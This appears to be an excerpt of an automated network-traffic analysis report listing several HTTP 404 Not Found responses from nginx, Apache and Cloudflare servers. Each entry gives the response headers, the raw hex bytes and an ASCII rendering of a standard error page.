69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:21:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:21:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:21:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:22:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:22:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: public, max-age=7200, stale-while-revalidate=7200, immutablecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XLjwqwQn%2FzTSx4KGGKeioXLoaD2kAIM%2Ftht%2BD%2F5KuzQpZVSuLJHawDMiO8w8aRIRQfZ5KZs4DMCu1iAK0v3tzi02NXx1VXThWsL77bVFMvs3jjNnM%2BTnE1kG2MJTOIEyhOabGROFl0U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c6fbfc9fd5d37-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=126969&min_rtt=126969&rtt_var=63484&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=856&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6a c3 30 10 44 ef fa 8a 6d ee f6 3a 21 87 1e 16 41 1b 3b 34 e0 a6 a6 55 0e 39 aa d1 16 99 24 96 23 ad 6b fa f7 c5 0e 85 5e 67 de 0c 33 f4 50 be 6d cc b1 a9 e0 c5 bc d6 d0 1c 9e eb dd 06 16 19 e2 ae 32 5b c4 d2 94 77 67 95 17 88 d5 7e a1 15 79 b9 5e 34 79 b6 4e 2b 92 56 2e ac d7 c5 1a f6 41 60 1b 86 ce 11 de 45 45 38 43 f4 19 dc cf 94 5b ea 7f 8c 5f 6a 45 bd 36 9e 21 f2 6d e0 24 ec e0 f0 5e c3 68 13 74 41 e0 6b e2 20 74 20 be 4d 90 38 7e 73 cc 09 fb a9 29 6a 45 d6 b9 c8 29 e9 a7 de 9e 3c c3 c7 0c 80 15 18 c7 31 bf 72 f2 e7 36 3b 85 6c 38 e7 c9 87 1e 9a 10 05 1e 0b c2 bf 9c 22 9c 87 11 ce 87 7e 01 00 00 ff ff e3 02 00 a7 8f 5e 7f 0b 01 00 00 0d 0a Data Ascii: e5Lj0Dm:!A;4U9$#k^g3Pm2[wg~y^4yN+V.A`EE8C[_jE6!m$^htAk t M8~s)jE)<1r6;l8"~^
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:22:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: public, max-age=7200, stale-while-revalidate=7200, immutablecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o9c4%2FpnhRCrPeJxKKYPwcR13nyTu4v0AqHd8AzdL%2FGWPu1nLd59NmU5G0Bl%2FZ%2Btwk4Oz5rwxTb%2BM9cgIoMuviYAZ9eDiKaRseIQ4us27ck4L0QVLXrOh2DkQSjnCabjim6LpFTHYAYM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c6fd07fe62ba1-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=123482&min_rtt=123482&rtt_var=61741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=876&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:22:12 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: public, max-age=7200, stale-while-revalidate=7200, immutablecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N13lsXxU%2B7KaGQ0nrQxgRo9ZSEE9x2tScjBZOxIlKtwGVLLGVBNCr%2BH0BVOXFexAYerVOeFpje6c%2BWON4cJ8L1MAmcKTRR57qu8LEHT1dljOR%2B3Fofef5jetYPwfAszHjanQaI8wJy0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c6fe12ddf96df-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=130410&min_rtt=130410&rtt_var=65205&sent=2&recv=8&lost=0&retrans=0&sent_bytes=0&recv_bytes=7133&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6a c3 30 10 44 ef fa 8a 6d ee f6 3a 21 87 1e 16 41 1b 3b 34 e0 a6 a6 55 0e 39 aa d1 16 99 24 96 23 ad 6b fa f7 c5 0e 85 5e 67 de 0c 33 f4 50 be 6d cc b1 a9 e0 c5 bc d6 d0 1c 9e eb dd 06 16 19 e2 ae 32 5b c4 d2 94 77 67 95 17 88 d5 7e a1 15 79 b9 5e 34 79 b6 4e 2b 92 56 2e ac d7 c5 1a f6 41 60 1b 86 ce 11 de 45 45 38 43 f4 19 dc cf 94 5b ea 7f 8c 5f 6a 45 bd 36 9e 21 f2 6d e0 24 ec e0 f0 5e c3 68 13 74 41 e0 6b e2 20 74 20 be 4d 90 38 7e 73 cc 09 fb a9 29 6a 45 d6 b9 c8 29 e9 a7 de 9e 3c c3 c7 0c 80 15 18 c7 31 bf 72 f2 e7 36 3b 85 6c 38 e7 c9 87 1e 9a 10 05 1e 0b c2 bf 9c 22 9c 87 11 ce 87 7e 01 00 00 ff ff e3 02 00 a7 8f 5e 7f 0b 01 00 00 0d 0a Data Ascii: e5Lj0Dm:!A;4U9$#k^g3Pm2[wg~y^4yN+V.A`EE8C[_jE6!m$^htAk t M8~s)jE)<1r6;l8"~^
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:22:15 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: public, max-age=14400, stale-while-revalidate=7200, immutableCF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q95XrPLbvELgWoWSvS2yWfNFacf2Z6J1LtdvMgy3JutSsh3slw%2FYBHdKK7gL4osrzHKdmDpwxYhuqNYF9WHxonTJKFwfVycGCW62l11qoYKpA6fYyEwuegFtxi5eazrIxC6NdclZIcE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c6ff1c8ce9614-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121859&min_rtt=121859&rtt_var=60929&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=580&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 73 68 6b 69 2d 63 6f 2d 75 6b 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 10b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.meshki-co-uk.shop Port 80</address></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Tue, 15 Apr 2025 15:22:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6e c2 30 10 44 ef f9 8a 2d a7 f6 80 37 45 41 ea c1 b2 d4 92 20 90 52 1a 15 e7 c0 d1 ad 17 39 02 e2 60 9b 86 fe 7d 9d a0 4a 5c 56 9a dd b7 a3 19 fe 90 7f 2c e4 ae 2a 60 25 df 4b a8 ea b7 72 bd 80 c9 14 71 5d c8 25 62 2e f3 db 65 c6 52 c4 62 33 11 09 37 e1 74 14 dc 90 d2 51 84 26 1c 49 64 69 06 1b 1b 60 69 2f ad e6 78 5b 26 1c 47 88 7f 59 fd 3b fc 3d 8b 3b 26 aa 84 77 42 1a 02 47 e7 0b f9 40 1a ea cf 12 7a e5 a1 8d dc 7e e0 c0 b6 10 4c e3 c1 93 fb 21 c7 38 76 83 93 8b 43 69 ed c8 7b f1 da a9 6f 43 38 63 19 9b cf e1 b1 6e 9b eb 13 6c 47 1c 54 80 be ef 99 3a ec 9b eb f4 e4 0f cc 07 eb 08 2a eb 02 bc a4 1c ff 3d 62 d4 31 64 8c 35 94 4b fe 00 32 4e 83 e0 17 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ecMn0D-7EA R9`}J\V,*`%Krq]%b.eRb37tQ&Idi`i/x[&GY;=;&wBG@z~L!8vCi{oC8cnlGT:*=b1d5K2N0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Tue, 15 Apr 2025 15:23:00 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6e c2 30 10 44 ef f9 8a 2d a7 f6 80 37 45 41 ea c1 b2 d4 92 20 90 52 1a 15 e7 c0 d1 ad 17 39 02 e2 60 9b 86 fe 7d 9d a0 4a 5c 56 9a dd b7 a3 19 fe 90 7f 2c e4 ae 2a 60 25 df 4b a8 ea b7 72 bd 80 c9 14 71 5d c8 25 62 2e f3 db 65 c6 52 c4 62 33 11 09 37 e1 74 14 dc 90 d2 51 84 26 1c 49 64 69 06 1b 1b 60 69 2f ad e6 78 5b 26 1c 47 88 7f 59 fd 3b fc 3d 8b 3b 26 aa 84 77 42 1a 02 47 e7 0b f9 40 1a ea cf 12 7a e5 a1 8d dc 7e e0 c0 b6 10 4c e3 c1 93 fb 21 c7 38 76 83 93 8b 43 69 ed c8 7b f1 da a9 6f 43 38 63 19 9b cf e1 b1 6e 9b eb 13 6c 47 1c 54 80 be ef 99 3a ec 9b eb f4 e4 0f cc 07 eb 08 2a eb 02 bc a4 1c ff 3d 62 d4 31 64 8c 35 94 4b fe 00 32 4e 83 e0 17 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ecMn0D-7EA R9`}J\V,*`%Krq]%b.eRb37tQ&Idi`i/x[&GY;=;&wBG@z~L!8vCi{oC8cnlGT:*=b1d5K2N0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Tue, 15 Apr 2025 15:23:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6e c2 30 10 44 ef f9 8a 2d a7 f6 80 37 45 41 ea c1 b2 d4 92 20 90 52 1a 15 e7 c0 d1 ad 17 39 02 e2 60 9b 86 fe 7d 9d a0 4a 5c 56 9a dd b7 a3 19 fe 90 7f 2c e4 ae 2a 60 25 df 4b a8 ea b7 72 bd 80 c9 14 71 5d c8 25 62 2e f3 db 65 c6 52 c4 62 33 11 09 37 e1 74 14 dc 90 d2 51 84 26 1c 49 64 69 06 1b 1b 60 69 2f ad e6 78 5b 26 1c 47 88 7f 59 fd 3b fc 3d 8b 3b 26 aa 84 77 42 1a 02 47 e7 0b f9 40 1a ea cf 12 7a e5 a1 8d dc 7e e0 c0 b6 10 4c e3 c1 93 fb 21 c7 38 76 83 93 8b 43 69 ed c8 7b f1 da a9 6f 43 38 63 19 9b cf e1 b1 6e 9b eb 13 6c 47 1c 54 80 be ef 99 3a ec 9b eb f4 e4 0f cc 07 eb 08 2a eb 02 bc a4 1c ff 3d 62 d4 31 64 8c 35 94 4b fe 00 32 4e 83 e0 17 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ecMn0D-7EA R9`}J\V,*`%Krq]%b.eRb37tQ&Idi`i/x[&GY;=;&wBG@z~L!8vCi{oC8cnlGT:*=b1d5K2N0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Tue, 15 Apr 2025 15:23:05 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 279Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 6b 66 69 78 2d 6d 73 6b 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.akfix-msk.store Port 80</address></body></html>
